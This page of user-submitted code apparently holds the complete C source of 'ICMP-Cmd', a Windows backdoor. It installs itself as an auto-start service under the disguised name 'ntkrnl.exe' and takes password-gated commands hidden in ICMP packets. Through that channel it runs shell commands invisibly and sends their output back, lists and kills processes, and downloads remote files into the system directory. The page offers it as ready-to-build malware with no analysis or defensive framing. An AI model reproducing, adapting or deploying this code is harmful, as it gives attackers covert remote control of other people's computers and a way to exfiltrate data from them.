Ask Question

Name:
Title:
Your Question:

Answer Question

Name:
Your Answer:
User Submitted Source Code!


Description:
  jj
Language: C/C++
Code:
#include <winsock2.h>
#include <stdio.h>
#include <urlmon.h> 
#include <tlhelp32.h>
#include "stdafx.h"
#pragma comment(lib, "Urlmon.lib")
#pragma comment(lib, "ws2_32.lib")
                   
#define ICMP_PASSWORD 1234                                             
#define STATUS_FAILED 0xFFFF
#define MAX_PACKET 6500
#define xmalloc(s) HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s))


/* The IP header */
typedef struct iphdr {
unsigned int h_len:4; //4位首部长度
unsigned int version:4; //IP版本号,4表示IPV4
unsigned char tos; //8位服务类型TOS
unsigned short total_len; //16位总长度(字节)
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位
unsigned char ttl; //8位生存时间 TTL
unsigned char proto; //8位协议 (TCP, UDP 或其他)
unsigned short checksum; //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
}IpHeader;


//定义ICMP首部
typedef struct _ihdr 
{
BYTE i_type; //8位类型
BYTE i_code; //8位代码
USHORT i_cksum; //16位校验和 
USHORT i_id; //识别号(一般用进程号作为识别号)
USHORT i_seq; //报文序列号 
ULONG timestamp; //时间戳
}IcmpHeader;

char arg[256];
char buffer[2048] = {0};//管道输出的数据
void decode_resp(char *,int ,struct sockaddr_in *);//ICMP解包函数
void fill_icmp_data(char * icmp_data);
void pslist(void);
BOOL killps(DWORD id);//杀进程函数
void send(void);
char *ICMP_DEST_IP;
USHORT checksum(USHORT *buffer, int size);



HANDLE                hMutex;
SERVICE_STATUS        ServiceStatus;
SERVICE_STATUS_HANDLE ServiceStatusHandle;

void  WINAPI ICMP_CmdStart(DWORD,LPTSTR *);
void  WINAPI CmdControl(DWORD);
DWORD WINAPI CmdService(LPVOID);
void  InstallCmdService(void);
void  RemoveCmdService(void);
void  usage(char *par);

int main(int argc,char *argv[])
{
SERVICE_TABLE_ENTRY DispatchTable[]={{"ntkrnl",ICMP_CmdStart},{NULL,NULL}};

if(argc==2)
     {
          if(!stricmp(argv[1],"-install"))
          {
               usage(argv[0]);
               InstallCmdService();
          }
          else if(!stricmp(argv[1],"-remove"))
          {
               usage(argv[0]);
               RemoveCmdService();
          }
         else usage(argv[0]);
          return 0;
     }
else usage(argv[0]);
          



     StartServiceCtrlDispatcher(DispatchTable);

     return 0;
}

void WINAPI ICMP_CmdStart(DWORD dwArgc,LPTSTR *lpArgv)
{
     HANDLE    hThread;

     ServiceStatus.dwServiceType             = SERVICE_WIN32;
     ServiceStatus.dwCurrentState            = SERVICE_START_PENDING;
     ServiceStatus.dwControlsAccepted        = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;
     ServiceStatus.dwServiceSpecificExitCode = 0;
     ServiceStatus.dwWin32ExitCode           = 0;
     ServiceStatus.dwCheckPoint              = 0;
     ServiceStatus.dwWaitHint                = 0;

     ServiceStatusHandle=RegisterServiceCtrlHandler("ntkrnl",CmdControl);
     if(ServiceStatusHandle==0)
     {
          OutputDebugString("RegisterServiceCtrlHandler Error !\n");
          return ;
     }

     ServiceStatus.dwCurrentState = SERVICE_RUNNING;
     ServiceStatus.dwCheckPoint   = 0;
     ServiceStatus.dwWaitHint     = 0;
     
     if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
     {
          OutputDebugString("SetServiceStatus in CmdStart Error !\n");
          return ;
     }

     hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL);
     if(hThread==NULL)
     {
          OutputDebugString("CreateThread in CmdStart Error !\n");
     }

     return ;
}

void WINAPI CmdControl(DWORD dwCode)
{
     switch(dwCode)
     {
     case SERVICE_CONTROL_PAUSE:
          ServiceStatus.dwCurrentState = SERVICE_PAUSED;
          break;

     case SERVICE_CONTROL_CONTINUE:
          ServiceStatus.dwCurrentState = SERVICE_RUNNING;
          break;

     case SERVICE_CONTROL_STOP:      
          WaitForSingleObject(hMutex,INFINITE);

          ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
          ServiceStatus.dwWin32ExitCode = 0;
          ServiceStatus.dwCheckPoint    = 0;
          ServiceStatus.dwWaitHint      = 0;
          if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
          {
               OutputDebugString("SetServiceStatus in CmdControl in Switch Error !\n");
          }

          ReleaseMutex(hMutex);
          CloseHandle(hMutex);
          return ;

     case SERVICE_CONTROL_INTERROGATE:
          break;

     default:
          break;
     }

     if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
     {
          OutputDebugString("SetServiceStatus in CmdControl out Switch Error !\n");
     }

     return ;
}

DWORD WINAPI CmdService(LPVOID lpParam)//这里是服务的主函数,把你的代码写在这里就可以成为服务
{   
char *icmp_data;
int bread,datasize,retval;
SOCKET sockRaw = (SOCKET)NULL;
WSADATA wsaData;
struct sockaddr_in dest,from;
int fromlen = sizeof(from);
int timeout = 2000;
char *recvbuf;



     if ((retval = WSAStartup(MAKEWORD(2,1),&wsaData)) != 0)
      {
           printf("WSAStartup failed: %s\n",retval);
           ExitProcess(STATUS_FAILED);
      }

      sockRaw = WSASocket (AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED);
      if (sockRaw == INVALID_SOCKET)
      {
           printf("WSASocket() failed: %s\n",WSAGetLastError());
           ExitProcess(STATUS_FAILED);
      }
__try{
bread = setsockopt(sockRaw,SOL_SOCKET,SO_RCVTIMEO,(char*)&timeout,sizeof(timeout));

if(bread == SOCKET_ERROR) __leave;


memset(&dest,0,sizeof(dest));
dest.sin_family = AF_INET;
datasize=0;
datasize += sizeof(IcmpHeader); 
icmp_data =(char*)xmalloc(MAX_PACKET);
recvbuf = (char*)xmalloc(MAX_PACKET);
if (!icmp_data) {
//fprintf(stderr,"HeapAlloc failed %d\n",GetLastError());
__leave;
}
memset(icmp_data,0,MAX_PACKET);
for(;;) {

int bwrote;
bwrote = sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest));

bread = recvfrom(sockRaw,recvbuf,MAX_PACKET,0,(struct sockaddr*)&from,&fromlen);
if (bread == SOCKET_ERROR)
{
if (WSAGetLastError() == WSAETIMEDOUT)continue;

 __leave;

}
decode_resp(recvbuf,bread,&from);
Sleep(200);
memset(recvbuf,0,sizeof(recvbuf));
}
}
__finally {
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}
     return 0;
}




void InstallCmdService(void)
{
     SC_HANDLE        schSCManager;
     SC_HANDLE        schService;
     char             lpCurrentPath[MAX_PATH];
     char             lpImagePath[MAX_PATH];
     char             *lpHostName;
    WIN32_FIND_DATA  FileData;
     HANDLE           hSearch;
     DWORD            dwErrorCode;
     SERVICE_STATUS   InstallServiceStatus;

     
          GetSystemDirectory(lpImagePath,MAX_PATH);
          strcat(lpImagePath,"\\ntkrnl.exe");
        lpHostName=NULL;
     
     printf("Transmitting File ... ");
     hSearch=FindFirstFile(lpImagePath,&FileData);
     if(hSearch==INVALID_HANDLE_VALUE)
     {
          GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
          if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0) 
          {
               dwErrorCode=GetLastError();
               if(dwErrorCode==5)
               {
                    printf("Failure ... Access is Denied !\n");         
               }
               else
               {
                    printf("Failure !\n");
               }
               return ;
          }
             else
          {
                  printf("Success !\n");
          }
     }
     else
     {
          printf("already Exists !\n");
          FindClose(hSearch);
     }

     schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
    if(schSCManager==NULL)
     {
          printf("Open Service Control Manager Database Failure !\n");
          return ;
     }

     printf("Creating Service .... ");
     schService=CreateService(schSCManager,"ntkrnl","ntkrnl",SERVICE_ALL_ACCESS,
                               SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,
                                    SERVICE_ERROR_IGNORE,"ntkrnl.exe",NULL,NULL,NULL,NULL,NULL); 
     if(schService==NULL)
     {
          dwErrorCode=GetLastError();
          if(dwErrorCode!=ERROR_SERVICE_EXISTS)
          {
                printf("Failure !\n");
               CloseServiceHandle(schSCManager);
                 return ;
          }
          else
          {
               printf("already Exists !\n");
               schService=OpenService(schSCManager,"ntkrnl",SERVICE_START);
               if(schService==NULL)
               {
                    printf("Opening Service .... Failure !\n");
                    CloseServiceHandle(schSCManager);
                    return ;
               }
          }
     }
     else
     {
          printf("Success !\n");
     }

     printf("Starting Service .... ");
     if(StartService(schService,0,NULL)==0)                         
     {
          dwErrorCode=GetLastError();
          if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
          {
               printf("already Running !\n");
             CloseServiceHandle(schSCManager);  
              CloseServiceHandle(schService);
              return ;
          }
     }
     else
     {
          printf("Pending ... ");
     }

     while(QueryServiceStatus(schService,&InstallServiceStatus)!=0)           
     {
          if(InstallServiceStatus.dwCurrentState==SERVICE_START_PENDING)
          {
               Sleep(100);
          }
          else
          {
               break;
          }
     }
     if(InstallServiceStatus.dwCurrentState!=SERVICE_RUNNING)
     {
          printf("Failure !\n");                       
     }
     else
     {
          printf("Success !\n");
     }

     CloseServiceHandle(schSCManager);
     CloseServiceHandle(schService);
     return ;
}

void RemoveCmdService(void) 
{
     SC_HANDLE        schSCManager;
     SC_HANDLE        schService;
     char             lpImagePath[MAX_PATH];
     char             *lpHostName;
    WIN32_FIND_DATA  FileData;
     SERVICE_STATUS   RemoveServiceStatus;
     HANDLE           hSearch;
     DWORD            dwErrorCode;


          GetSystemDirectory(lpImagePath,MAX_PATH);
          strcat(lpImagePath,"\\ntkrnl.exe");
        lpHostName=NULL;
     

     schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
    if(schSCManager==NULL)
     {
          printf("Opening SCM ......... ");
          dwErrorCode=GetLastError();
          if(dwErrorCode!=5)
          {
               printf("Failure !\n"); 
          }
          else
          {
               printf("Failuer ... Access is Denied !\n");
          }
          return ;
     }

     schService=OpenService(schSCManager,"ntkrnl",SERVICE_ALL_ACCESS);
     if(schService==NULL) 
     {
         printf("Opening Service ..... ");
          dwErrorCode=GetLastError();
          if(dwErrorCode==1060)
          {
               printf("no Exists !\n");
          }
          else
          {
               printf("Failure !\n");
          }
          CloseServiceHandle(schSCManager);
     }
     else
     {
          printf("Stopping Service .... ");
          if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0)
          {
                 if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
               {
                   printf("already Stopped !\n"); 
               }
               else
               {
                    printf("Pending ... ");
                    if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0)
                    {
                          while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)         
                         {
                             Sleep(10);
                             QueryServiceStatus(schService,&RemoveServiceStatus);
                         }
                          if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
                         {
                               printf("Success !\n");
                         }
                          else
                         {
                             printf("Failure !\n");
                         }
                    }
                    else
                    {
                         printf("Failure !\n");          
                    }
               }
          }
         else
          {
              printf("Query Failure !\n");
          }

          printf("Removing Service .... ");     
           if(DeleteService(schService)==0)
          {
                printf("Failure !\n");   
          }
          else
          {
                printf("Success !\n");
          }
     }

     CloseServiceHandle(schSCManager);        
     CloseServiceHandle(schService);

     printf("Removing File ....... ");
     Sleep(1500);
     hSearch=FindFirstFile(lpImagePath,&FileData);
     if(hSearch==INVALID_HANDLE_VALUE)
     {
          printf("no Exists !\n");
     }
     else
     {
          if(DeleteFile(lpImagePath)==0)
          {
               printf("Failure !\n");               
          }
          else
          {
               printf("Success !\n");
          }
          FindClose(hSearch);
     }

     return ;
}

void decode_resp(char *buf, int bytes,struct sockaddr_in *from) 
{


IpHeader *iphdr;
IcmpHeader *icmphdr;
unsigned short iphdrlen;
iphdr = (IpHeader *)buf;
iphdrlen = iphdr->h_len * 4 ; 
icmphdr = (IcmpHeader*)(buf + iphdrlen);
if(icmphdr->i_seq==ICMP_PASSWORD)//密码正确则输出数据段
{

ICMP_DEST_IP=inet_ntoa(from->sin_addr);//取得ICMP包的源地址

memcpy(arg,buf+iphdrlen+12,256);
if (!memcmp(arg,"pskill",6))
{
     killps(atoi(strstr(arg," ")));
     memcpy(buffer,"Process is Killed!",sizeof("Process is Killed!"));
     send();
}



else if (!memcmp(arg,"pslist",6)){pslist();send();}
else if (!strcmp(arg,"remove\n"))
{
     RemoveCmdService();
     memcpy(buffer,"Service Removed!",sizeof("Service Removed!"));
     send();
     return;
}
////////////************    http下载   *************
else if (!memcmp(arg,"http://",7))   
{
     if(char *FileName=strstr(arg,"-"))
     {
     
          char url[200];//保存网址的数组
          memset(url,0,200);
          memcpy(url,arg,int(FileName-arg-1));
          char fname[MAX_PATH];
          GetSystemDirectory(fname,MAX_PATH);
          FileName++;
          strcat(fname,"\\");
          strcat(fname,FileName);
          *strstr(fname,"\n")=NULL;
          HRESULT hRet=URLDownloadToFile(0,url,fname,0,0);
          memset(buffer,0,sizeof(buffer));
          if(hRet==S_OK) memcpy(buffer,"Download OK!\n",sizeof("Download OK\n"));
          else 
               memcpy(buffer,"Download Failure!\n",sizeof("Download Failure!\n"));
          send();
          return;
     }
}
//*******************************************
else{

SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出
HANDLE hRead,hWrite;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if (!CreatePipe(&hRead,&hWrite,&sa,0)) 
{
  printf("Error On CreatePipe()");
     return;
  } 


STARTUPINFO si;
PROCESS_INFORMATION pi; 
si.cb = sizeof(STARTUPINFO);
GetStartupInfo(&si); 
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

char cmdline[270];
GetSystemDirectory(cmdline,MAX_PATH+1);

strcat(cmdline,"\\cmd.exe /c");

strcat(cmdline,arg);
if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi)) 
{
        printf("Error on CreateProcess()");
        return;
}
  CloseHandle(hWrite);
        
  
DWORD bytesRead; 

for(;;){
if (!ReadFile(hRead,buffer,2048,&bytesRead,NULL))break;
Sleep(200);
}
//printf("%s",buffer);
/////////////////////////////////////////////
     //发送输出数据

send();

}
////////////////////////////////////////////////


}
//else printf("Other ICMP Packets!\n");
//printf(endl; 
}




USHORT checksum(USHORT *buffer, int size) 
{
unsigned long cksum=0;
while(size >1) 
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size ) {
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}


void fill_icmp_data(char * icmp_data)
{

IcmpHeader *icmp_hdr;
char *datapart;
icmp_hdr = (IcmpHeader*)icmp_data;
icmp_hdr->i_type = 0;
icmp_hdr->i_code = 0;
icmp_hdr->i_id = (USHORT) GetCurrentProcessId();
icmp_hdr->i_cksum = 0;
icmp_hdr->i_seq =4321;
icmp_hdr->timestamp = GetTickCount(); //设置时间戳
datapart = icmp_data + sizeof(IcmpHeader);
memcpy(datapart,buffer,strlen(buffer));
//for(int i=0;i<sizeof(buffer);i++) datapart[i]=buffer[i]; 
}

void  usage(char *par)
{

    printf("\t\t=====Welcome to www.hackerxfiles.net======\n");
     printf("\n");
     printf("\t\t---[ ICMP-Cmd v1.0 beta, by gxisone   ]---\n");
     printf("\t\t---[ E-mail: [email protected]      ]---\n");
     printf("\t\t---[                        2003/8/15 ]---\n");
     printf("\n");
     printf("\t\tUsage: %s -install (to install service)\n",par);
     printf("\t\t       %s -remove (to remove service)\n",par);
     printf("\n");

     return ;


}

void send(void)
{

WSADATA wsaData;
SOCKET sockRaw = (SOCKET)NULL;
struct sockaddr_in dest;
int bread,datasize,retval,bwrote;
int timeout = 1000;
char *icmp_data;

if((retval=WSAStartup(MAKEWORD(2,1),&wsaData)) != 0) ExitProcess(STATUS_FAILED);
if((sockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED))
==INVALID_SOCKET) ExitProcess(STATUS_FAILED);
__try
{
if((bread=setsockopt(sockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&timeout,sizeof(timeout)))==SOCKET_ERROR) __leave;
//设置发送超时
memset(&dest,0,sizeof(dest));
dest.sin_family = AF_INET;
dest.sin_addr.s_addr = inet_addr(ICMP_DEST_IP);
datasize=strlen(buffer);
datasize+=sizeof(IcmpHeader); 
icmp_data=(char*)xmalloc(MAX_PACKET);

if(!icmp_data) __leave;
memset(icmp_data,0,MAX_PACKET);

fill_icmp_data(icmp_data); //填充ICMP报文
((IcmpHeader*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, datasize); //计算校验和
bwrote=sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest)); //发送报文

if (bwrote == SOCKET_ERROR)
{
//if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out\n");
//printf("sendto failed:"<<WSAGetLastError()<<endl;
__leave;
}

//printf("Send Packet to %s Success!\n"<<ICMP_DEST_IP<<endl;
}


__finally 
{
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}
memset(buffer,0,sizeof(buffer));
Sleep(200);

}

void pslist(void)
{
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32= {0};
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == (HANDLE)-1)
{
printf("\nCreateToolhelp32Snapshot() failed:%d",GetLastError());
return ;
}
pe32.dwSize = sizeof(PROCESSENTRY32);
printf("\nProcessName     ProcessID");
if (Process32First(hProcessSnap, &pe32))
{
     char a[5];

do
{
strcat(buffer,pe32.szExeFile);
strcat(buffer,"\t\t");
itoa(pe32.th32ProcessID,a,10);
strcat(buffer,a);
strcat(buffer,"\n");
//printf("\n%-20s%d",pe32.szExeFile,pe32.th32ProcessID);
}
while (Process32Next(hProcessSnap, &pe32));

}
else
{
 printf("\nProcess32Firstt() failed:%d",GetLastError());
}
CloseHandle (hProcessSnap);
return;
}

BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege)//提示权限
{
TOKEN_PRIVILEGES tp;
LUID luid;

if(!LookupPrivilegeValue(NULL,lpszPrivilege,&luid))
{
printf("\nLookupPrivilegeValue error:%d", GetLastError() ); 
return FALSE; 
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[0].Attributes = 0;
// Enable the privilege or disable all privileges.
AdjustTokenPrivileges(
hToken, 
FALSE, 
&tp, 
sizeof(TOKEN_PRIVILEGES), 
(PTOKEN_PRIVILEGES) NULL, 
(PDWORD) NULL); 
// Call GetLastError to determine whether the function succeeded.
if (GetLastError() != ERROR_SUCCESS) 

printf("AdjustTokenPrivileges failed: %u\n", GetLastError() ); 
return FALSE; 

return TRUE;
}
////////////////////////////////////////////////////////////////////////////
BOOL killps(DWORD id)//杀进程函数
{
HANDLE hProcess=NULL,hProcessToken=NULL;
BOOL IsKilled=FALSE,bRet=FALSE;
__try
{

if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken))
{
printf("\nOpen Current Process Token failed:%d",GetLastError());
__leave;
}
//printf("\nOpen Current Process Token ok!");
if(!SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE))
{
__leave;
}
printf("\nSetPrivilege ok!");

if((hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,id))==NULL)
{
printf("\nOpen Process %d failed:%d",id,GetLastError());
__leave;
}
//printf("\nOpen Process %d ok!",id);
if(!TerminateProcess(hProcess,1))
{
printf("\nTerminateProcess failed:%d",GetLastError());
__leave;
}
IsKilled=TRUE;
}
__finally
{
if(hProcessToken!=NULL) CloseHandle(hProcessToken);
if(hProcess!=NULL) CloseHandle(hProcess);
}
return(IsKilled);
}

Comments: